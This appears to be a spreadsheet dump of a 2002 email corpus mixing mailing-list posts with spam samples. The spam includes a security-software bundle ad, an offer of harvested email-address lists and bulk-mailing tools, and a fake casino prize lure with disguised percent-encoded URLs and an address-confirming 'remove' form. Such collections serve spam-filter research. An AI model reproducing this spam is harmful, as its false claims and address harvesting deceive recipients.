 F99"&gt;Yes 6!&lt;/font&gt;&lt;/i&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt; 
             - Feature-Packed Utilities&lt;br&gt;ALL for &lt;/font&gt;&lt;font face=3D"Tah=
 oma" size=3D"4" color=3D"#FFFF99"&gt;1&lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#=
 FFFFFF" size=3D"4"&gt;
             Special &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFFF=
 99"&gt;LOW&lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;
             Price of &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFF=
 F99"&gt;Only
             $29.99!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"4" width=3D"100%" height=3D"135" bgcolor=3D"#800000=
 " bordercolor=3D"#FFFFFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"129" bgcolor=3D"#FFFF99" bordercolo=
 r=3D"#800000"&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"2"&gt;&lt;font color=3D"#000000"&gt;=
 This
             Software Will:&lt;/font&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;br&gt;&amp;nbsp;&lt;/font&gt;=
 &lt;font color=3D"#FF0000"&gt;-
             Protect your computer from unwanted and &lt;i&gt; hazardous&lt;/i&gt;  vir=
 uses&lt;br&gt;&amp;nbsp;-
             Help secure your private &amp;amp; valuable information&lt;br&gt;&amp;nbsp;-=
  Allow
             you to transfer files and send e-mails &lt;u&gt; safely&lt;/u&gt;&lt;br&gt;&amp;nbsp=
 ;-
             Backup your ALL your data quick and easily&lt;br&gt;&amp;nbsp;- Improve =
 your
             PC's performance w/&lt;i&gt;superior&lt;/i&gt;
             integral diagnostics!&lt;br&gt;&amp;nbsp;- &lt;i&gt;You'll NEVER have to take =
 your
             PC to the repair shop AGAIN!&lt;/i&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;&amp;nbsp;
       &lt;table border=3D"4" width=3D"100%" height=3D"4" bgcolor=3D"#FFFFFF" =
 bordercolor=3D"#FFFF99"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"1"&gt;
             &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"5" face=3D"Tahoma"&gt;&lt;font =
 color=3D"#000000"&gt;&lt;font color=3D"#ff0000"&gt;6&lt;/font&gt;
             Feature-Packed Utilities
             &lt;/font&gt;&lt;font color=3D"#000080" size=3D"5"&gt;&lt;br&gt;&lt;/font&gt;&lt;u&gt;&lt;font =
 color=3D"#ff0000"&gt;1&lt;/font&gt;&lt;font color=3D"#000000"&gt;
             Great Price&lt;/font&gt;&lt;/u&gt;&lt;font color=3D"#000000" size=3D"5"&gt; &lt;br&gt;
             A &lt;font color=3D"#ff0000"&gt;$300+&lt;/font&gt;  
             Combined Retail Value
             &lt;/font&gt;
             &lt;i&gt;&lt;font color=3D"#FF0000"&gt;YOURS&lt;/font&gt;&lt;/i&gt; &lt;font color=3D"#00=
 0000"&gt; for
             Only &lt;font color=3D"#ff0000"&gt;$29.99!&lt;/font&gt;
             &lt;/font&gt;&lt;/font&gt;&lt;font size=3D"6"&gt;&lt;br&gt;
             &lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Tahoma" size=3D"4"&gt;&lt;font color=3D"#00=
 0000"&gt;&amp;lt;
             Price Includes &lt;/font&gt;&lt;font color=3D"#FF0000"&gt;FREE&lt;/font&gt;&lt;font=
  color=3D"#000080"&gt; 
             &lt;/font&gt;&lt;font color=3D"#000000"&gt;Shipping! &amp;gt;&lt;br&gt;&lt;/font&gt;&lt;/font=
 &gt;&lt;font color=3D"#FF0000" size=3D"3" face=3D"Impact"&gt;And
             For a Limited time Buy Any 2 of Our Products &amp;amp; Get 1 Free!=
 &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;p align=3D"Center"&gt;&lt;b&gt; &lt;font face=3D"Arial" size=3D"3" color=3D"#FFFF=
 FF"&gt;Don't fall
     prey to destructive viruses or hackers!&lt;br&gt;Protect&amp;nbsp; your computer=
  and
     your valuable information and&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;table border=3D"4" width=3D"100%" height=3D"44" bordercolor=3D"#FFF=
 F99" bgcolor=3D"#FFFF99"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"38" bgcolor=3D"#FFFFFF" align=3D"ce=
 nter"&gt;&lt;b&gt;&lt;a href=3D"http://www.anythinggoeshere.com/" style=3D"color: #FF0=
 000; font-family: Verdana; font-size: 14pt; font-weight: bold"&gt;&lt;font face=3D=
 "Tahoma" size=3D"4" color=3D"#FF0000"&gt;-&amp;gt;
             CLICK HERE to Order Yours NOW! &amp;lt;-&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p align=3D"Center"&gt;&lt;font face=3D"Verdana" size=3D"5" color=3D"#FFFF=
 99"&gt;&lt;b&gt;or Call
       Toll-Free 1-800-861-1481!&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"Center"&gt;&lt;font color=3D"#ffffff" size=3D"1" face=3D"Tahom=
 a"&gt;Your email
       address was obtained from an opt-in list. Opt-in IMCAS (Ineternet
       Mail Coalition Against Spam) Approved List - &amp;nbsp;Reference #
       3r3109uZ.&amp;nbsp;&amp;nbsp;If you wish to be unsubscribed from this list, =
 please &lt;a style=3D"COLOR: #ffffcc" href=3D"http://www.anythinggoeshere.com=
 /remove.asp"&gt;Click
       here&lt;/a&gt; . Allow 5 Business days for removal. If you have previously=
  unsubscribed and are still receiving
       this message, you may email our &lt;a style=3D"COLOR: #ffffcc" href=3D"=
 http://www.anythinggoeshere.com/abuse.asp"&gt;Spam
       Abuse Control Center&lt;/a&gt;. We do not condone spam in any shape or for=
 m.
       Thank You kindly for your cooperation.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Quantum cryptography takes to the skies
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8483156,1440/
 Date: Not supplied
 Keys encoded in photons of light are sent 23 kilometres through air, an 
 important step towards a secure global communications system
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: DataPower announces XML-in-silicon
</t>
  </si>
  <si>
    <t xml:space="preserve">On 27 Aug 2002 at 15:00, Rohit Khare wrote:
 &gt; 
 &gt; DATAPOWER TECHNOLOGY ON Monday unveiled its network device
 &gt; designed specifically to process XML data. Unlike competing
 &gt; solutions that process XML data in software, DataPower's
 &gt; device processes the data in hardware -- a technology
 &gt; achievement that provides greater performance, according to
 &gt; company officials.
 &gt;
 Sarvega seems to have a similar product.  http://www.sarvega.com.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ben Silverman, the publisher of Dotcom Scoop, says the Rosen
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:7:04:44AM
 Date: Wed, 25 Sep 2002 14:04:44 GMT
 Ben Silverman, the publisher of Dotcom Scoop, says the Rosen email is real, and 
 part of a confidential internal memo[1] that outlines the RIAA's legal strategy 
 re Kazaa, Music City and Grokster. 
 [1] http://www.dotcomscoop.com/article.php?sid=39
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Sep 05, 2002 at 06:16:57PM -0500, Mike Burger wrote:
 &gt; You might be better asking this on the spamassassin-talk list.  The folks 
 &gt; there will almost definitely have an answer for this.
 Thanks, I just posted a similar message there.
 -Dave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</si>
  <si>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Aaron Swartz: "If everyone is afraid to speak, who will defend
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:8:35:25AM
 Date: Tue, 24 Sep 2002 15:35:25 GMT
 Aaron Swartz[1]: "If everyone is afraid to speak, who will defend our right to 
 download?" _I'm not afraid._
 [1] http://www.aaronsw.com/weblog/000613
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The power of Email Marketing
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=gb2312"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;Dear friend&lt;/title&gt;
 &lt;style type="text/css"&gt; 
 &lt;!-- 
 a { color: #339966; text-decoration: none} 
 a:hover { color: #FF3300; text-decoration: underline} 
 --&gt; 
 &lt;/style&gt; 
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p&gt;&lt;font face="Arial"&gt;&lt;font size="-1"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;font size="2"&gt;You are receiving this email because you              
 registered to receive special offers from one of our marketing
 partners.&amp;nbsp;&lt;br&gt;             
 If you would prefer not to receive future emails, &lt;font
 color="#000000"&gt;please click              
 here to unsubscribe: &lt;/font&gt;&lt;a href="mailto:EmailMarketing@eyou.com"&gt;&lt;font
 color="#0000FF"&gt;EmailMarketing@eyou.com&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;      
 &lt;p&gt;&lt;font face="Arial"&gt;&lt;br&gt;       
 &lt;font color="#000000"&gt;Tens of millions of people now use email as a fast
 and   
 effective method of&amp;nbsp; communicating&amp;nbsp;&lt;br&gt;  
 with friends and&amp;nbsp; business colleagues.&amp;nbsp; Many&amp;nbsp; email&amp;nbsp;
 users   
 will&amp;nbsp; be potential&amp;nbsp; buyers of your&amp;nbsp;&lt;br&gt;  
 product or service.&lt;/font&gt;&amp;nbsp; If you want to                            
 introduce and&amp;nbsp;sell your                           
 product or service,&amp;nbsp; it would be the&amp;nbsp;&lt;br&gt;  
  best way&amp;nbsp; for you&amp;nbsp; to use                            
 the&amp;nbsp; email to&amp;nbsp;contact &amp;nbsp;with&amp;nbsp; your&amp;nbsp;targeted&amp;nbsp;
 customers   
 (of&amp;nbsp;course&amp;nbsp;you should&amp;nbsp;be&amp;nbsp;aware&amp;nbsp;of&amp;nbsp;          
 the&amp;nbsp;
 email&amp;nbsp;address&amp;nbsp;of&amp;nbsp;the&amp;nbsp;targeted&amp;nbsp;customers&amp;nbsp;
 firstly&amp;nbsp;).Targeted&amp;nbsp;email   
 is&amp;nbsp;&lt;br&gt;  
  no doubt                            
 very effective. If&amp;nbsp; you&amp;nbsp;could introduce
 your&amp;nbsp;product&amp;nbsp;or&amp;nbsp;service&amp;nbsp;through&amp;nbsp;
 email&amp;nbsp;directly&amp;nbsp;&amp;nbsp;&lt;br&gt;  
  to&amp;nbsp;                            
 the&amp;nbsp;customer who&amp;nbsp;are interested in them,&amp;nbsp;it&amp;nbsp;will bring
 to you much&amp;nbsp; more business&amp;nbsp;chance&amp;nbsp;&lt;br&gt;  
  and success.&lt;br&gt;                           
 &lt;br&gt;                           
 XinLan Internet Marketing Center , has many years of experience in
 developing&amp;nbsp;   
 &lt;font size="1"&gt;&amp;amp;&amp;nbsp;&lt;/font&gt; utilizing&amp;nbsp;&lt;br&gt;                     
 internet resources.We have set up global business email address databases,
 which&amp;nbsp;                            
 contain&lt;br&gt;                           
 millions&amp;nbsp; of&amp;nbsp;&amp;nbsp; email&amp;nbsp; addresses of&amp;nbsp;
 commercial&amp;nbsp;                            
 enterprises and&amp;nbsp; consumers&amp;nbsp;all over the world.&amp;nbsp;&lt;br&gt;        
 These email addresses are sorted by countries and fields.&amp;nbsp;By
 using&amp;nbsp; advanced&amp;nbsp;                          
 professional&lt;br&gt;                          
 technology, we also continuously update our databases,add
 new&amp;nbsp;addresses ,&amp;nbsp;                            
 remove undel-&lt;br&gt;                           
 iverables and unsubscribe&amp;nbsp;addresses.With  the cooperation with our
 partners,                       
 We are able to&lt;br&gt;                       
 supply&amp;nbsp; valid targeted email&amp;nbsp; addresses&amp;nbsp; according&amp;nbsp;
 to&amp;nbsp;                       
 your&amp;nbsp; requirements ( for example,&amp;nbsp; you&amp;nbsp;&lt;br&gt;                
  need&amp;nbsp;some email                            
 addresses of Importers in the field of auto spare parts in
 England).With&amp;nbsp;our&amp;nbsp;&lt;br&gt;                      
 supplied email addresses,you                         
 can easily and directly contact your potential customers.&lt;br&gt;             
 &lt;br&gt;                                                 
 We also supply&amp;nbsp; a&amp;nbsp; wide variety&amp;nbsp; of software.&amp;nbsp;&lt;br&gt;    
 For example ,&amp;nbsp;Wcast,&amp;nbsp; the software for&amp;nbsp; fast-sending
 emails:&amp;nbsp;              
 this software                                                 
 will enable&amp;nbsp;you to&amp;nbsp;&lt;br&gt;                                         
  send&amp;nbsp; emails&amp;nbsp; at&amp;nbsp; the rate of&amp;nbsp; over 10,000&amp;nbsp;
 pcs&amp;nbsp;                                  
 per hour,&amp;nbsp;and to release&amp;nbsp; information&amp;nbsp; to&amp;nbsp;&lt;br&gt;        
  thousands of people in a short&amp;nbsp; time.&lt;br&gt;                           
 &lt;br&gt;                                                 
 We are pleased to tell you that we are now offering our best prices
 :&lt;/font&gt;&lt;/p&gt;                                
 &lt;div align="left"&gt;                                               
   &lt;table border="1" width="628" height="103"&gt;                             
     &lt;tr&gt;                                               
       &lt;td width="204" height="17"&gt;&lt;b&gt;&lt;font face="Arial"
 size="2"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;           
         Emails&amp;nbsp; or&amp;nbsp; Software&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;                    
       &lt;td width="336" height="17"&gt;&lt;b&gt;&lt;font face="Arial"
 size="2"&gt;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;                          
         &amp;nbsp;&amp;nbsp; Remarks&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;                              
       &lt;td width="66" height="17"&gt;&lt;b&gt;&lt;font face="Arial" size="2"
 color="#000000"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;                                        
         Price&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;                                             
     &lt;/tr&gt;                                                
     &lt;tr&gt;                                                
       &lt;td width="204" height="94"&gt;&lt;font size="2" face="Arial"&gt;&amp;nbsp;50,000
 targeted                                       
         email addresses&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                 
       &lt;td width="336" height="94"&gt;&lt;font face="Arial"&gt;&lt;br&gt;                 
         &lt;font size="2"&gt;We are able&amp;nbsp;to&amp;nbsp;supply&amp;nbsp;              
         valid&amp;nbsp; targeted&amp;nbsp; email&amp;nbsp;addresses according to your 
         requirements , which&amp;nbsp;are all compiled&amp;nbsp; upon
 your&amp;nbsp;order,such&amp;nbsp;as                                     
         region / country / occupation&amp;nbsp;/ field&amp;nbsp;/ Domain Name
 (like                                  
         AOL.com or MSN.com) etc.&lt;br&gt;                                        
         &lt;br&gt;                                        
         &lt;/font&gt;&lt;/font&gt;&lt;/td&gt;                                              
       &lt;td width="66" height="115"&gt;&lt;font face="Arial" size="1"
 color="#000000"&gt;&amp;nbsp;                 
         USD 30.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                       
     &lt;/tr&gt;                                                 
     &lt;tr&gt;                                        
       &lt;td width="204" height="15"&gt;&lt;font face="Arial" size="2"
 color="#000000"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;         
         Classified email addresses&lt;/font&gt;&lt;/td&gt;                            
       &lt;td width="336" height="15"&gt;&lt;font face="Arial" size="2"
 color="#000000"&gt;&lt;br&gt;                                      
         Our database contains more than 1600 sort of email addresses,and
 can         
         meet with your different demands.&lt;br&gt;                             
         &amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                            
       &lt;td width="66" height="19"&gt;&lt;font face="Arial" size="1"
 color="#000000"&gt;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                  
     &lt;/tr&gt;                                     
     &lt;tr&gt;                                              
       &lt;td width="204" height="6"&gt;&lt;font size="2"
 face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; 8  
         million email addresses&lt;/font&gt;&lt;/td&gt;                               
       &lt;td width="336" height="6"&gt;&lt;font size="2" face="Arial"&gt;&lt;br&gt;         
         8 million global commercial enterprises email addresses&lt;br&gt;       
         &amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                                 
       &lt;td width="66" height="6"&gt;&lt;font face="Arial" size="1"
 color="#000000"&gt;&amp;nbsp;USD                                                  
         240.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                          
     &lt;/tr&gt;                                                
     &lt;tr&gt;                                                
       &lt;td width="204" height="4"&gt;&lt;font size="2"
 face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;               
         Wcast software&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                  
       &lt;td width="336" height="4"&gt;&lt;font size="2" face="Arial"&gt;&lt;br&gt;         
         Software for fast-sending emails&amp;nbsp;&lt;br&gt;                        
         &amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                                
       &lt;td width="66" height="4"&gt;&lt;font face="Arial" size="1"
 color="#000000"&gt;&amp;nbsp;                 
         USD 39.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                       
     &lt;/tr&gt;                                                
     &lt;tr&gt;                                                
       &lt;td width="204" height="47"&gt;&lt;font size="2"
 face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;                         
         Email searcher software&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                         
       &lt;td width="336" height="47"&gt;&lt;font size="2" face="Arial"&gt;            
         Software for searching targeted email addresses&lt;br&gt;               
         &lt;/font&gt;&lt;/td&gt;                                                  
       &lt;td width="66" height="47"&gt;&lt;font face="Arial" size="1"
 color="#000000"&gt;&amp;nbsp;                 
         USD 68.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                       
     &lt;/tr&gt;                                                
     &lt;tr&gt;                                   
       &lt;td width="204" height="11"&gt;&lt;font face="Arial"&gt;&lt;b&gt;&lt;font size="3"
 color="#000000"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;   
         &lt;/font&gt;                                  
         &lt;/b&gt;&lt;font size="2" color="#000000"&gt;Global Trade                   
         Poster&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;                                         
       &lt;td width="336" height="11"&gt;&lt;font face="Arial"&gt;&lt;font size="2"&gt;&lt;br&gt;  
         Spread info about your business and your products over 1500 trade 
         message boards and newgroups.&amp;nbsp;&amp;nbsp;&lt;br&gt;                 
         &amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;                                         
       &lt;td width="66" height="11"&gt;&lt;font face="Arial" size="1"
 color="#000000"&gt;&amp;nbsp;USD               
         135.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                          
     &lt;/tr&gt;                                
     &lt;tr&gt;                                             
       &lt;td width="204" height="10"&gt;&lt;font size="2"
 face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;                         
         Jet-Hits Plus 2000 Pro&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                          
       &lt;td width="336" height="10"&gt;&lt;font size="2" face="Arial"&gt;&lt;br&gt;        
         Software for submitting website to 8000+&amp;nbsp; search
 engines&amp;nbsp;&lt;br&gt;                                                 
         &amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                                 
       &lt;td width="66" height="10"&gt;&lt;font face="Arial" size="1"
 color="#000000"&gt;&amp;nbsp;                 
         USD 79.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                       
     &lt;/tr&gt;                                                
   &lt;/table&gt;                                                
 &lt;/div&gt;                                                
 &lt;p&gt;&lt;font face="Arial"&gt;&lt;br&gt;                                               
 You may directly order the emails or&amp;nbsp; softwares&amp;nbsp; from our       
 website.&amp;nbsp;&lt;font size="3" color="#000000"&gt;For more details,
 please&amp;nbsp;&lt;br&gt;              
  refer to our website&lt;/font&gt;&lt;font size="3"&gt;.&lt;/font&gt;&lt;font size="3"
 color="#000000"&gt;&lt;br&gt;                                           
 &lt;br&gt;                                           
 It is our honour if you are interested in our services or softwares.&amp;nbsp;
 &lt;/font&gt;Please do not hesitate to&lt;br&gt;                            
 contact us if any queries or concerns.&amp;nbsp;We are glad to&amp;nbsp;serve
 you.&lt;br&gt;                                                  
 &lt;br&gt;                                                  
 &lt;br&gt;                                                  
 Best regards!&lt;br&gt;                                                  
 &lt;br&gt;                                                  
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;font size="3"&gt;K. Peng&lt;br&gt;      
 Marketing Manager&lt;br&gt;                
 &lt;font color="#0000FF"&gt;&lt;a
 href="mailto:XinLancenter@163.com"&gt;XinLancenter@163.com&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;
 &lt;/font&gt;&lt;font size="3"&gt;&lt;font color="#0000FF"&gt;&lt;a
 href="Http://xinlan.24cc.com"&gt;&lt;br&gt;    
 Http://XinLan.24cc.com&lt;/a&gt;&lt;/font&gt;&lt;br&gt;      
 XinLan Internet Marketing Center&lt;/font&gt;&lt;/p&gt;                               
 &lt;/body&gt;                                             
 &lt;/html&gt;                                             
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: sed /s/United States/Roman Empire/g
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Mr.
 &gt; FoRK
 &gt; Also, the lifestyle of the remnants of those
 &gt; societies is on average only marginally above poverty even today.
 As I understand it, there is a huge difference between native Americans
 who speak english at home and those who do not.  I don't have figures
 that separate those at hand, though.
 1989 American Indians (US Pop as a whole) -- Families below poverty
 27.2% (10%), Persons below poverty 31.2 (13.1), Speak a language other
 than English 23 (13.8) Married couple families 65.8 (79.5) Median family
 income $21,619 ($35,225) Per Capita $8,284 ($14,420).
 Note: High Income countries in 1989 were defined as having over $6,000
 per capita.  American Indians separated from the rest of the US society
 would still be considered a high-income society.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: You Won $30 Dollars !
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body bgcolor="#003300"&gt;
 &lt;P align=center&gt;&lt;FONT color=#ffffff size=5&gt;Congratulations, 
 You Won $30 Free&lt;BR&gt;Today At The Internet's Best &amp;amp; Most&lt;BR&gt;Trusted On-Line 
 Casino!&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=center&gt;&lt;FONT color=#669966&gt;&lt;FONT color=#ffffff size=4&gt;To Collect Your 
 $30 Cash &lt;/FONT&gt;&lt;A 
 href="http://81.9.8.41"&gt;&lt;FONT 
 size=4&gt;Click Here!&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=center&gt;&lt;A 
 href="http://81.9.8.41"&gt;&lt;IMG 
 alt="Click Here To Collect Your $30 Dollars Free And Start Playing!" 
 src="http://members.triposd.uk%81900955key=96589521081900955index=A21r7P6qW81900955.79048@%77%77%77.%70%72%65%73%74%69%67%65%63%61%73%69%6e%6f.%63%6f%6d/%70ic/%70%72e%76ie%77%73/%62i%67/%62%6cac%6b%6aac%6b.%6a%70%67" 
 border=0&gt;&lt;/A&gt;&lt;/P&gt;
 &lt;P align=center&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=center&gt;&lt;FONT color=#ffffff size=5&gt;To Collect Your $30 Cash &lt;/FONT&gt;&lt;A 
 href="http://81.9.8.41"&gt;&lt;FONT 
 size=5&gt;Click Here!&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;
 &lt;P align=center&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=center&gt;&lt;A 
 href="http://81.9.8.41"&gt;&lt;IMG 
 alt="Click Here To Collect Your $30 Dollars Free And Start Playing!" 
 src="http://members.triposd.uk%21362822key=96589521021362822index=A21r7P6qW21362822.4140327@%77%77%77.%70%72%65%73%74%69%67%65%63%61%73%69%6e%6f.%63%6f%6d/%70ic/a%77a%72%64%73/%67om%5f%74o%70ca%73i%6eo%5f%64a%72%6b%31.%67i%66" 
 border=0&gt;&lt;/A&gt;&lt;/P&gt;
 &lt;P align=center&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=center&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=center&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;
 &lt;form name="form" method="post" action="http://81.9.8.41/r/process_cleanlist.php"&gt;
 &lt;DIV align=center&gt; 
             &lt;table width="391" border="1" cellspacing="0" cellpadding="0" align="center" bordercolor="#000000"&gt;
               &lt;tr&gt; 
                 &lt;td&gt; 
                   &lt;table width="400" border="0" cellspacing="0" cellpadding="2" bgcolor="#cccccc"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt;
             &lt;P&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;This message is sent in compliance of the new 
             e-mail bill:&lt;BR&gt;SECTION 301 Per Section 301, Paragraph (a)(2)(C) of 
             S. 1618,&lt;BR&gt;Further transmissions to you by the sender of this email 
             maybe&lt;BR&gt;stopped at no cost to you by entering your email address 
             to&lt;BR&gt;the form in this email and clicking submit to be 
             automatically&lt;BR&gt;   
                                removed. &lt;/font&gt;&lt;FONT 
             face="Arial, Helvetica, sans-serif" size=2&gt;To be Removed from our 
             Opt-In mailing list. Please enter your email address in the provided 
             box below and click remove, thank you. 
       &lt;/FONT&gt;&lt;/P&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                   &lt;table width="400" border="0" cellspacing="0" cellpadding="0" bgcolor="#cccccc"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt; 
                         &lt;div align="center"&gt; 
                           &lt;input type="hidden" name="subject" value="REMOVE"&gt;
                           &lt;input name="email" size="30" 
            &gt;
                           &lt;input type="submit" name="Submit" value="REMOVE"&gt;
                         &lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                   &lt;div align="center"&gt;&lt;/div&gt;
                   &lt;div align="center"&gt;&lt;/div&gt;
                   &lt;table width="400" border="0" cellspacing="0" cellpadding="0" bgcolor="#cccccc"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt; 
                         &lt;div align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="1"&gt;Your 
                           E-mail Address Will Be Immediately Removed From All Mailing Lists&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;&lt;/DIV&gt;
         &lt;/form&gt;
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;
 &lt;/P&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Titan to be probed. Saturn to offer post probe cigarette
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8268033,1717/
 Date: 2002-09-26T08:22:36+01:00
 [IMG: http://www.newsisfree.com/Images/fark/scotsman.gif ([The Scotsman])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: quick hack
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000624
 Date: 2002-10-01T22:36:19-06:00
 New York Times as a Weblog[1] (source code[2]) Comments appreciated. Yes, I 
 know UserLand had something like this[3] but as you can see it doesn't seem to 
 be working anymore. 
 [1] http://nytimes.blogspace.com/
 [2] http://nytimes.blogspace.com/source.py
 [3] http://radio.weblogs.com/0102250/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ALSA (almost) made easy
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all,
 I've decided at last to test the ALSA sound drivers. As usual the result is
 that I've spent much more time repackaging the darn thing than actually
 testing the functionalities or trying to hear the great sound quality
 people seem to think it outputs... but hey, some of you will benefit from
 that, right? ;-)
 I've got the whole thing working on a Valhalla system, but the packages
 should easily install or at least recompile on Enigma, Limbo/(null) and
 maybe others, who knows ;-)
 Here are quick instructions for those of you that wish to try it out :
